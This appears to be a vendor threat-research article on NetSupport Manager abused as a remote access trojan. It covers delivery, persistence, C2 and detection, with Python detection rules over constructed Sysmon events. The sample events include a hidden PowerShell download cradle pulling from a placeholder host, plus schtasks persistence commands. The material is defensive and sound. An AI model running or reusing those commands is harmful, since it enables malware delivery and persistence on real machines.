NetSupport Manager is a legitimate remote administration tool that has been commercially available since 1989. Originally designed for IT helpdesks to provide remote support, it has become one of the most frequently weaponised legitimate tools in the cybercriminal ecosystem. Its legitimate origins make it particularly challenging to detect: it is digitally signed, widely recognised by security tools as benign software, and its network traffic blends with legitimate remote administration protocols.
The SenseOn Threat Research Team has observed a sustained increase in NetSupport RAT deployments across our customer base throughout 2024. This article provides a technical analysis of the delivery mechanisms, persistence techniques, command-and-control infrastructure, and detection opportunities that our research has identified.
Why Threat Actors Choose NetSupport Manager
NetSupport Manager offers several characteristics that make it attractive to threat actors:
Legitimacy: As a commercially available tool with valid code-signing certificates, NetSupport Manager is frequently allowlisted by endpoint security products. Many organisations explicitly permit it for their own IT support operations, creating a pre-existing exception that attackers exploit.
Full remote control: Unlike purpose-built RATs that may offer limited functionality, NetSupport Manager provides complete remote desktop control, file transfer, registry editing, command execution, and inventory management. It is a fully featured remote administration suite.
Stealth: NetSupport Manager can be configured to run silently, without the system tray icon or user notifications that would alert the victim to its presence. The silent installation mode is a configuration option, not a modification that would trigger behavioural detection.
Infrastructure simplicity: Threat actors do not need to develop or maintain custom command-and-control infrastructure. NetSupport Manager's built-in gateway system handles NAT traversal and connection management.
Delivery Mechanisms
Our analysis has identified three primary delivery mechanisms used in current NetSupport RAT campaigns.
Fake Browser Update Pages
The most prevalent delivery mechanism involves compromised websites that display convincing fake browser update notifications. When a user visits a compromised site, injected JavaScript evaluates the visitor's browser type and displays a tailored update prompt: Chrome users see a Chrome update page, Edge users see an Edge update page, and Firefox users see a Firefox update page.
Clicking the update button downloads a ZIP archive containing a heavily obfuscated JavaScript file. When executed, this JavaScript file uses PowerShell to download and install the NetSupport Manager client in silent mode. The JavaScript dropper typically uses multiple layers of obfuscation, including string concatenation, base64 encoding, character code conversion, and environment variable abuse, to evade static analysis.
Phishing with Malicious Attachments
Phishing campaigns deliver NetSupport RAT through Microsoft Office documents containing malicious macros or, increasingly, through OneNote documents with embedded scripts. The OneNote vector has gained popularity since Microsoft's default blocking of VBA macros in documents downloaded from the internet.
A typical attack chain begins with an email purporting to be an invoice, shipping notification, or legal document. The attached OneNote file contains an embedded HTA (HTML Application) file disguised as a button or image. Clicking the disguised element executes the HTA, which launches a PowerShell download cradle that retrieves and installs NetSupport Manager.
Malvertising Chains
Sophisticated campaigns use malvertising, malicious advertisements served through legitimate advertising networks, to redirect users through a series of traffic distribution systems (TDS) before landing on a fake software download page. These pages mimic legitimate software repositories and offer trojanised installers that bundle NetSupport Manager with the expected software.
Persistence Mechanisms
Once installed, NetSupport RAT campaigns employ several persistence mechanisms to survive system reboots:
Registry Run keys: The most common persistence mechanism adds entries to HKCU\Software\Microsoft\Windows\CurrentVersion\Run or the equivalent HKLM key. The entry points to the NetSupport Manager executable, often placed in a directory designed to appear legitimate (e.g., C:\Users\<user>\AppData\Roaming\Microsoft\NetSupport\).
Scheduled tasks: Some variants create scheduled tasks that execute the NetSupport Manager client at logon or at regular intervals. The task names are designed to blend with legitimate Windows tasks: names like WindowsUpdateCheck or SystemHealthMonitor are common.
Startup folder shortcuts: Simpler deployments place a shortcut (.lnk file) in the user's Startup folder. Whilst less stealthy than registry modifications, this approach requires no elevated privileges.
WMI event subscriptions: More sophisticated campaigns use Windows Management Instrumentation (WMI) event subscriptions to trigger execution. WMI persistence is particularly difficult to detect because it does not create visible file system artefacts and is not displayed in common autoruns enumeration tools.
Command-and-Control Communication
NetSupport Manager communicates with its controller using a proprietary protocol over TCP, typically on port 5405, though this is configurable. The traffic characteristics include:
Initial handshake: The client initiates a connection to the configured gateway or controller address. The handshake includes client identification information and capability negotiation.
Encrypted channel: Communication between client and controller is encrypted, making content inspection difficult. However, the protocol's handshake patterns and packet size distributions create identifiable network signatures.
Gateway infrastructure: Many campaigns use NetSupport Manager's gateway feature, which acts as a relay between the controller and clients behind NAT. Threat actors configure gateways on infrastructure they control, typically compromised servers or rented VPS instances.
HTTP tunnelling: Some configurations tunnel NetSupport Manager traffic through HTTP to bypass firewall restrictions. This variant communicates on port 80 or 443 and encapsulates the proprietary protocol within HTTP requests.
Detection Opportunities
Despite NetSupport Manager's legitimate origins, several detection opportunities exist at each stage of the attack chain.
Delivery Stage
- JavaScript execution from browser downloads: Monitor for wscript.exe or cscript.exe executing JavaScript files from browser download directories.
- PowerShell download cradles: Detect PowerShell commands containing Invoke-WebRequest, Net.WebClient, or Start-BitsTransfer that download executable content.
- OneNote spawning script engines: Alert on onenote.exe spawning mshta.exe, wscript.exe, cscript.exe, or powershell.exe.
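The three delivery-stage rules above, expressed as detection logic over process-creation telemetry. This is an added example, not SenseOn's detection content: the Sysmon-style records, host names and the example.invalid URL are constructed, and the field names (host, parent, image, cmdline) are an assumed reduction of a Sysmon Event ID 1 record.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records reduced to the
# fields the rules need. Sample data, not telemetry from the article.
SAMPLE_EVENTS = [
    # Fake browser update: Chrome download -> wscript runs a .js from Downloads
    {"host": "WS01", "parent": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Update\ChromeUpdate.js"'},
    # The dropper's PowerShell download cradle (placeholder URL)
    {"host": "WS01", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://example.invalid/c.zip','C:\\Users\\alice\\AppData\\Roaming\\c.zip')\""},
    # OneNote attachment launching an embedded HTA
    {"host": "WS02", "parent": r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\bob\AppData\Local\Temp\invoice.hta"},
    # Benign administrative PowerShell: must not match
    {"host": "WS03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -Command Get-ChildItem C:\\Temp"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOAD_DIRS = ("\\downloads\\", "\\appdata\\local\\temp\\")
CRADLE_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"invoke-webrequest", r"\biwr\b", r"net\.webclient",
    r"start-bitstransfer", r"downloadfile|downloadstring",
)]
ONENOTE_CHILDREN = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def script_from_downloads(ev: dict) -> bool:
    """Rule 1: wscript/cscript executing a .js/.jse file from a download location."""
    if basename(ev["image"]) not in SCRIPT_HOSTS:
        return False
    cmd = ev["cmdline"].lower()
    return any(d in cmd for d in DOWNLOAD_DIRS) and re.search(r"\.jse?\b", cmd) is not None


def powershell_download_cradle(ev: dict) -> bool:
    """Rule 2: PowerShell command line containing a known download primitive."""
    if basename(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return False
    return any(p.search(ev["cmdline"]) for p in CRADLE_PATTERNS)


def onenote_spawns_script_engine(ev: dict) -> bool:
    """Rule 3: onenote.exe as the parent of a script host, mshta or PowerShell."""
    return basename(ev["parent"]) == "onenote.exe" and basename(ev["image"]) in ONENOTE_CHILDREN


RULES = {
    "js_from_download_dir": script_from_downloads,
    "powershell_download_cradle": powershell_download_cradle,
    "onenote_spawns_script_engine": onenote_spawns_script_engine,
}


def run_delivery_rules(events):
    """Return (host, rule_name) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((ev["host"], name))
    return hits


if __name__ == "__main__":
    for host, rule in run_delivery_rules(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The cradle patterns are matched case-insensitively because PowerShell cmdlets and .NET type names are case-insensitive, and the download-directory check is a substring match so that nested folders inside Downloads (as in the fake-update ZIP extraction above) still hit.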
Installation Stage
- NetSupport Manager file artefacts: Monitor for the creation of client32.exe, client32.ini, NSM.lic, and related files outside expected IT administration directories.
- Silent installation flags: Detect command-line execution of NetSupport Manager installers with silent installation parameters.
- Suspicious directory creation: Alert on creation of directories mimicking system paths within user-writable locations.
Persistence Stage
- Registry monitoring: Track additions to Run/RunOnce registry keys that reference executables in atypical locations.
- Scheduled task creation: Monitor schtasks.exe creating tasks that execute binaries from user-writable paths.
- WMI subscription creation: Audit WMI event consumer and filter creation events (Event IDs 19, 20, 21 in Sysmon).
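The persistence-stage rules above (Run/RunOnce keys pointing at atypical locations, schtasks creating tasks that run from user-writable paths, and Sysmon WMI Event IDs 19 to 21), as an added example of detection logic. This is not SenseOn's or NetSupport's code: the records are constructed Sysmon-style events, the host names, SID and task names are made up, and the "user-writable" prefix list is an assumption that a real deployment would tune.

```python
import re

# Locations an unprivileged user can write to; an assumed list, tune per estate.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
RUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")

# Constructed Sysmon records: Event ID 13 (registry value set), Event ID 1
# (process creation) and Event ID 20 (WMI consumer). Sample data only.
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 13,
     "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetSupport",
     "details": r"C:\Users\alice\AppData\Roaming\Microsoft\NetSupport\client32.exe"},
    # Legitimate vendor agent under Program Files: must not match
    {"host": "WS04", "event_id": 13,
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "details": r'"C:\Program Files\Vendor\agent.exe" /background'},
    {"host": "WS02", "event_id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn WindowsUpdateCheck /tr "C:\Users\bob\AppData\Roaming\Microsoft\NetSupport\client32.exe" /sc onlogon'},
    {"host": "WS03", "event_id": 20, "name": "SystemHealthMonitor", "type": "Command Line",
     "destination": r"C:\Users\carol\AppData\Roaming\Microsoft\NetSupport\client32.exe"},
]


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_user_writable(path: str) -> bool:
    """True when the (possibly quoted) path sits in a user-writable location."""
    p = path.strip().lstrip('"').lower()
    return p.startswith(USER_WRITABLE_PREFIXES) or "\\appdata\\" in p


def run_key_to_user_writable_path(ev: dict) -> bool:
    """Run/RunOnce value whose data points at an executable in a user-writable path."""
    if ev["event_id"] != 13:
        return False
    target = ev["target"].lower()
    return any(k in target for k in RUN_KEYS) and is_user_writable(ev["details"])


def schtasks_user_writable_binary(ev: dict) -> bool:
    """schtasks /create whose /tr action runs a binary from a user-writable path."""
    if ev["event_id"] != 1 or basename(ev["image"]) != "schtasks.exe":
        return False
    cmd = ev["cmdline"]
    if "/create" not in cmd.lower():
        return False
    m = re.search(r'/tr\s+"?([^"]+)', cmd, re.IGNORECASE)
    return m is not None and is_user_writable(m.group(1))


def wmi_subscription_activity(ev: dict) -> bool:
    """Any WMI filter (19), consumer (20) or binding (21) creation is worth auditing."""
    return ev["event_id"] in (19, 20, 21)


RULES = {
    "run_key_to_user_writable_path": run_key_to_user_writable_path,
    "schtasks_user_writable_binary": schtasks_user_writable_binary,
    "wmi_subscription_activity": wmi_subscription_activity,
}


def run_persistence_rules(events):
    """Return (host, rule_name) pairs for every matching event."""
    return [(ev["host"], name) for ev in events for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for host, rule in run_persistence_rules(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

The WMI rule deliberately fires on every consumer or filter creation rather than trying to judge the consumer's command: these events are rare enough on most workstations that auditing all of them is cheaper than missing one, and the destination field is kept in the record so an analyst can see where the consumer points.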
Command-and-Control Stage
- Network signatures: Monitor for NetSupport Manager's proprietary protocol signatures on non-standard ports.
- Gateway communication patterns: Detect sustained outbound connections to IP addresses associated with known NetSupport RAT infrastructure.
- Anomalous remote administration traffic: Flag NetSupport Manager network traffic from endpoints that are not authorised for remote administration.
SenseOn's Multi-Layer Detection Approach
SenseOn's platform is uniquely positioned to detect NetSupport RAT activity because it monitors endpoint, network, and identity telemetry simultaneously. Traditional security tools that focus on a single telemetry source may detect individual indicators but miss the broader attack narrative.
The cross-domain correlation engine correlates signals across layers: a suspicious JavaScript execution on the endpoint, combined with a PowerShell download cradle, followed by NetSupport Manager network traffic to an uncategorised external IP, creates a high-confidence detection that no single-layer tool could achieve with the same accuracy.
Behavioural baselines are particularly effective against NetSupport RAT. Because the tool is legitimately used in many organisations, signature-based detection alone produces false positives. SenseOn's unsupervised learning models establish which endpoints normally generate remote administration traffic and to which destinations, enabling precise detection of anomalous NetSupport Manager usage without disrupting legitimate IT operations.
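The two ideas in this section, correlating stage findings per host and baselining which endpoints are allowed to generate remote-administration traffic to which destinations, as an added worked example. It is not SenseOn's correlation engine: the stage weights, thresholds, time window, authorised host list, gateway address, the 203.0.113.42 documentation address and all findings are constructed, and the findings are assumed to come from per-stage rules of the kind described earlier in the article.

```python
from datetime import datetime, timedelta

# Constructed baseline of authorised remote-administration usage.
AUTHORISED_HOSTS = {"HELPDESK01"}
KNOWN_DESTINATIONS = {"10.0.5.10"}      # the organisation's own NetSupport gateway
NETSUPPORT_PORT = 5405                  # default controller port per the article

# Assumed scoring: weights per attack stage and a correlation window.
STAGE_WEIGHTS = {"delivery": 30, "installation": 25, "persistence": 25, "c2": 40}
WINDOW = timedelta(hours=2)

# Constructed findings as emitted by per-stage endpoint rules: (host, stage, time).
FINDINGS = [
    ("WS01", "delivery", "2024-06-03T09:02:10"),
    ("WS01", "installation", "2024-06-03T09:03:41"),
    ("WS01", "persistence", "2024-06-03T09:03:55"),
    ("WS05", "delivery", "2024-06-03T14:10:00"),   # lone finding, no follow-on
]

# Constructed outbound connections (Sysmon Event ID 3 style).
CONNECTIONS = [
    {"host": "WS01", "dst": "203.0.113.42", "port": 5405, "time": "2024-06-03T09:05:12"},
    {"host": "HELPDESK01", "dst": "10.0.5.10", "port": 5405, "time": "2024-06-03T09:30:00"},
    {"host": "WS07", "dst": "10.0.5.10", "port": 5405, "time": "2024-06-03T10:00:00"},
]


def network_findings(connections):
    """Turn NetSupport-port connections that fall outside the baseline into c2 findings."""
    out = []
    for c in connections:
        if c["port"] != NETSUPPORT_PORT:
            continue
        if c["host"] in AUTHORISED_HOSTS and c["dst"] in KNOWN_DESTINATIONS:
            continue  # authorised endpoint talking to the known gateway: expected
        out.append((c["host"], "c2", c["time"]))
    return out


def correlate(findings):
    """Score each host by the distinct stages seen within WINDOW of its first finding."""
    by_host = {}
    for host, stage, ts in findings:
        by_host.setdefault(host, []).append((datetime.fromisoformat(ts), stage))
    results = {}
    for host, items in by_host.items():
        items.sort()
        start = items[0][0]
        stages = {stage for t, stage in items if t - start <= WINDOW}
        score = sum(STAGE_WEIGHTS[s] for s in stages)
        verdict = "high" if score >= 90 else "medium" if score >= 40 else "low"
        results[host] = {"score": score, "verdict": verdict, "stages": sorted(stages)}
    return results


def assess(findings, connections):
    """Combine endpoint findings with baseline-filtered network findings."""
    return correlate(list(findings) + network_findings(connections))


if __name__ == "__main__":
    for host, r in sorted(assess(FINDINGS, CONNECTIONS).items()):
        print(f"{host}: {r['verdict']} ({r['score']}) stages={r['stages']}")
```

WS01 reaches "high" only because endpoint and network evidence are combined; WS07 reaches "medium" purely from the baseline (an endpoint that is not authorised for remote administration talking to the legitimate gateway), which is the case signature-only detection would miss; HELPDESK01 produces nothing because it matches the baseline.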
Recommendations
Organisations should take the following steps to defend against NetSupport RAT campaigns:
- Audit existing NetSupport Manager deployments: Know where the tool is legitimately installed and establish a baseline of authorised usage.
- Implement application control: Restrict NetSupport Manager execution to authorised endpoints and user accounts.
- Monitor delivery vectors: Deploy detection rules for the JavaScript, PowerShell, and OneNote delivery mechanisms described above.
- Network segmentation: Ensure that remote administration traffic is restricted to approved network segments and destinations.
- User awareness: Educate users about fake browser update pages and the risks of executing downloaded scripts.